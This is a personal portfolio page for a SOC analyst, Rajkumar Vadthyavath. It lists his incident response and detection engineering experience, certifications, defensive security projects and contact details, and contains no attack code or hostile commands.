Cybersecurity Professional

Cyber Defense
& Detection

Incident Response · SIEM Engineering · SOAR Automation

Enterprise SOC analyst with 4.5+ years defending critical infrastructure. Closed 300+ high-severity incidents, reduced triage time by 60%, and engineered 85+ production detection rules mapped to MITRE ATT&CK.

View My Work ↗ Get In Touch

Connect

Active & Available

Towson, MD

🛡️

CYBER ANALYST

Rajkumar Vadthyavath — M.S. Applied IT (GPA 3.93), Splunk Power User, AZ-104, CompTIA Security+. Best Performer at TCS SOC Operations, Dec 2023.

300+

Incidents Closed

60%

Triage Reduction

4.5yr

Experience

🔴 Splunk Enterprise

🔵 Microsoft Sentinel

🟡 CrowdStrike Falcon

🟢 Microsoft Defender

🟣 Azure / Entra ID

🔶 MITRE ATT&CK

🔷 Trellix / McAfee

⚫ SOAR Automation

🔴 Splunk Enterprise

🔵 Microsoft Sentinel

🟡 CrowdStrike Falcon

🟢 Microsoft Defender

🟣 Azure / Entra ID

🔶 MITRE ATT&CK

🔷 Trellix / McAfee

⚫ SOAR Automation

About Me

Defending enterprise systems is more than a role — it's a mission.

🔒

▶

Rajkumar Vadthyavath is an enterprise SOC analyst with 4.5 years of hands-on incident response, detection engineering, and SOAR automation experience in a 25+ analyst, hybrid-cloud environment supporting a 30,000-employee critical manufacturing organization.

Consistently closing measurable gaps: reduced alert triage time from 30 to 12 minutes, cut false positive rate from 18% to 11%, and accelerated known-indicator detection by 70% through automated threat intelligence correlation.

Currently pursuing M.S. Applied IT at Towson University (GPA 3.93) while serving as Cybersecurity Instructor and Graduate Teaching Assistant. Recognized as Best Performer among 25+ analysts at TCS SOC Operations, December 2023.

High-Severity Incidents Investigated & Closed

Reduction in Alert Triage Time

Production Detection Rules Built

Faster Threat Intelligence Detection

Skills & Expertise

Technical Arsenal

A full-stack SOC capability set built across 4.5 years of real-world threat response in enterprise environments.

SIEM (Splunk SPL + KQL)96%

Incident Response (IR)95%

SOAR Automation & Playbooks92%

Detection Engineering93%

EDR (Defender / CrowdStrike)90%

Threat Intelligence (STIX/TAXII)88%

Cloud Security (Azure / AWS)85%

Python / SOAR Scripting82%

INCIDENT RESPONSE

SPLUNK SPL

MICROSOFT SENTINEL

SOAR PLAYBOOKS

MITRE ATT&CK

KQL QUERIES

CROWDSTRIKE

ZERO TRUST

THREAT INTEL

AZURE ENTRA ID

NIST CSF

INCIDENT RESPONSE

SPLUNK SPL

MICROSOFT SENTINEL

SOAR PLAYBOOKS

MITRE ATT&CK

KQL QUERIES

CROWDSTRIKE

ZERO TRUST

THREAT INTEL

Certifications

🏆Splunk Core Certified Power User

☁️Azure Administrator Associate (AZ-104)

🔐CompTIA Security+ (SY0-701)

🛡️(ISC)² Certified in Cybersecurity (CC)

🎯CompTIA CySA+ (Pursuing)

⚡AWS Cloud Practitioner (Pursuing)

Experience

A career built on closing threats and driving measurable security outcomes.

Senior Cyber Incident Response Analyst

Tata Consultancy Services · Tata Steel Europe (Onsite)

Led end-to-end investigation of 300+ high-severity incidents across identity compromise, malware, PowerShell/LOLBin abuse, lateral movement, and executive-targeted phishing. Designated senior escalation authority for 25+ analyst SOC. Engineered 85+ production detection rules (50+ SPL + 35+ KQL). Architected 20+ SOAR playbooks cutting triage from 30 to 12 minutes. Recognized as Best Performer Dec 2023.

Splunk SOAR Microsoft Sentinel MITRE ATT&CK EDR Threat Intel STIX/TAXII ServiceNow

2020 – 2024

Cybersecurity Instructor — Cloud Operations & Detection Engineering

Towson University · Towson, MD

Designed and delivered enterprise-grade lab curriculum covering Azure cloud operations, SIEM monitoring, and automated IR workflows. Built repeatable detection engineering frameworks deployed consistently across multiple graduate cohorts.

Azure SIEM Detection Engineering Curriculum Design

Aug – Dec 2025

Graduate Teaching Assistant — Cybersecurity & Big Data Analytics

Towson University · Towson, MD

Supported graduate labs in log analysis, data interpretation, and operational performance evaluation. Delivered structured feedback improving students' analytical reasoning and documentation quality.

Log Analysis Big Data Graduate Education

Aug 2025 – May 2026

Network Security Intern — Cisco Structured Program

Cisco Systems · Remote

Completed Cisco network security internship covering routing & switching fundamentals, IP addressing, security protocol configuration, and network device hardening in simulated enterprise environments.

Cisco Network Security TCP/IP Device Hardening

May – Jun 2020

Key Projects

High-impact security
engineering at scale

↗

⚡

Multi-Source SOAR Automation Platform

Engineered 20+ end-to-end SOAR playbooks across 6 threat categories integrating 8+ external APIs. Automated IOC enrichment, malware detonation, ITSM ticket lifecycle, and alert suppression. Cut per-alert triage time from 30 to 12 minutes and eliminated 95% of repeat false positives.

Splunk SOAR Sentinel Logic Apps VirusTotal API Hybrid Analysis ServiceNow Python

60%

Triage Reduction

95%

False Pos. Eliminated

20+

Playbooks Built

↗

🏛️

Zero Trust Architecture Design

Designed end-to-end Zero Trust architecture aligned to NIST SP 800-207 and CISA ZT Maturity Model with Conditional Access, MFA, RBAC segmentation, and PIM controls. Full mapping to NIST SP 800-53 and ISO 27001.

Azure AD NIST 800-207 ISO 27001 ZT Maturity

↗

🔍

Detection Engineering — 85+ Rules

Built and maintained 50+ Splunk SPL correlation searches and 35+ Sentinel KQL analytics rules mapped to MITRE ATT&CK. Behavioral baselining of 500+ privileged accounts, regression testing eliminating repeat false positives.

SPL KQL MITRE ATT&CK

↗

🎯

Threat Intelligence Automation

Operationalized STIX/TAXII feeds from 6+ intelligence sources into Splunk and Sentinel. Automated IOC-to-alert correlation reducing known-indicator detection time by 70%. Proactively identified APT staging infrastructure before production impact.

STIX/TAXII AlienVault OTX VirusTotal URLScan.io

↗

📧

Phishing IR & Awareness Program

Directed phishing investigation pipeline for spear-phishing, executive impersonation, and QR-code credential harvesting. Automated URL/attachment detonation via SOAR; led cross-functional awareness initiative reducing phishing click rate by 50%.

SOAR ANY.RUN Email IR

Recognition

Rajkumar's technical leadership during a high-severity ransomware precursor threatening production OT systems was exceptional. His depth of investigation, speed of containment, and thorough documentation set a benchmark for the entire team.

★★★★★

TCS SOC Operations Leadership

Best Performer Award · December 2023 · Selected from 25+ Analysts

Let's Connect

Ready to
strengthen your security posture?

Available for SOC analyst roles, detection engineering positions, and cybersecurity consulting opportunities. Let's discuss how I can bring measurable impact to your security operations.

✉ Hire Me Now

✉

Rajkumar6.work@gmail.com

✆

Phone

(475) 347-9266

📍

Location

Towson, MD

linkedin.com/in/raj-kumar28

⌥

GitHub